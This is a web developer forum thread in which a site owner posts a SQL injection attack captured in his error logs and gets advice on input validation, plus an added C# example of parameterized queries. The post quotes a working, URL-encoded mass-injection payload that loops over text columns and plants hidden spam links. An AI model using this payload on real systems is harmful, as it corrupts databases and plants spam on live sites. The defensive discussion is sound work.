Someone trying to break into my database

  • Question

  • User661479005 posted

    I have an application with user login and a CMS system.
    On all my pages there is a Sub Page_Error that sends me an email when an error occurs.

    For some weeks I have been receiving daily error mails from the application because some people try to write a SQL query in the querystring.

    I feel that we have done everything to prevent this kind of people from getting into our system, but I would like to know if any of you have some experience with how to handle attacks like this.

    See an example here where somebody adds a query after wid=2 :

    id=55&wid=2';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''abortion%20pill%20prescription%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2BREPLACE(case%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''www.survivingediscovery.com@abortionpill''%20when%201%20then%20''www.nunosolutions.com@template''%20else%20''hannetoft.dk@template''%20end,''@'',char(47))%2B''%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''read%20here''%20when%201%20then%20''ordering%20abortion%20pills%20to%20be%20shipped%20to%20house''%20else%20''abortion%20pill''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20order%20abortion%20pill''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c--&sm=c

    Thursday, December 11, 2014 7:17 AM

Answers

  • User1508394307 posted

    Most likely it's an automatic scanner which tries to find vulnerabilities such as SQL injections. You can't stop it from happening, but you could try

    validate input and catch exceptions

    • use a try..catch block so that the exception does not happen and no email will be sent
    • validate values - so if wid is supposed to be an int value - then check it with int.TryParse(). If it's a string then check for maximum length or presence of ' or even compare against a predefined list (e.g. if only "1" or "2" is expected then it makes sense to check "if (wid=="1" || wid=="2")")
    • for other ideas read http://msdn.microsoft.com/en-us/library/ff648339.aspx

    to confuse the scanner you could

    • change pages so that instead of querystring you use either HTTP POST (form) or URL Rewrite (e.g. instead of having "page.aspx?id=55&wid=2" you could rewrite to "page.aspx/55/2")

    Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Thursday, December 11, 2014 7:37 AM
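The validation and parameterization the answer recommends, written out as an added example for an ASP.NET Web Forms page that reads ?id=55&wid=2 (this is illustrative code, not the asker's application or the answerer's; the original app appears to be VB.NET, while this uses C#). The connection string, the Pages table and its columns, the BodyLiteral control, and the allow-list of wid values are all assumed. It shows the concatenated query that the scanner's payload would turn into a multi-statement batch, next to the hardened version that rejects bad input with a 400 before any SQL runs and binds the surviving values as parameters.

```csharp
// Added example, not code from the original thread. Assumptions: connection
// string ConnStr, table Pages(Id int, Wid varchar, Body nvarchar), a Literal
// control named BodyLiteral on the page, and wid limited to "1" or "2".
using System;
using System.Data;
using System.Data.SqlClient;
using System.Diagnostics;
using System.Web;
using System.Web.UI;

public partial class PageView : Page
{
    private const string ConnStr = "Server=.;Database=Cms;Integrated Security=true"; // assumed
    private static readonly string[] AllowedWid = { "1", "2" };                      // assumed allow-list

    // The pattern the scanner is probing for: query-string text pasted into SQL.
    // With wid = "2';declare @c cursor;...--" the whole injected batch executes.
    private static string BuildVulnerableSql(string id, string wid)
    {
        return "SELECT Body FROM Pages WHERE Id = " + id + " AND Wid = '" + wid + "'";
    }

    // Returns false instead of throwing when either value fails validation, so the
    // caller can answer the request without tripping Page_Error's e-mail.
    public static bool TryValidate(string rawId, string rawWid, out int id, out string wid)
    {
        wid = null;
        if (!int.TryParse(rawId, out id) || id <= 0) return false;
        if (rawWid == null || rawWid.Length > 2 || Array.IndexOf(AllowedWid, rawWid) < 0) return false;
        wid = rawWid;
        return true;
    }

    // Hardened query: values are bound as typed parameters, so the driver never
    // treats them as SQL text even if validation were loosened later.
    private static string LoadPageBody(int id, string wid)
    {
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand("SELECT Body FROM Pages WHERE Id = @id AND Wid = @wid", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            cmd.Parameters.Add("@wid", SqlDbType.VarChar, 2).Value = wid;
            conn.Open();
            return (string)cmd.ExecuteScalar();
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        int id; string wid;
        if (!TryValidate(Request.QueryString["id"], Request.QueryString["wid"], out id, out wid))
        {
            // Expected noise from scanners: record it and end the request with 400.
            // CompleteRequest() avoids the ThreadAbortException that Response.End() raises.
            Trace.TraceWarning("Rejected query string from {0}: {1}",
                Request.UserHostAddress, Request.QueryString.ToString());
            Response.StatusCode = 400;
            Response.SuppressContent = true;
            Context.ApplicationInstance.CompleteRequest();
            return;
        }
        BodyLiteral.Text = HttpUtility.HtmlEncode(LoadPageBody(id, wid) ?? string.Empty);
    }
}
```

Only validation failures are handled quietly here; a genuine SqlException from LoadPageBody still propagates to Page_Error, so the e-mail alert keeps signalling real database problems instead of scanner traffic. The rejected requests go to the trace log, which gives a place to count or rate-limit the source addresses if the probing continues.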

All replies

  • User661479005 posted

    Hi Smirnov


    Thank you very much for your answer and the link.

    Thursday, December 11, 2014 9:17 AM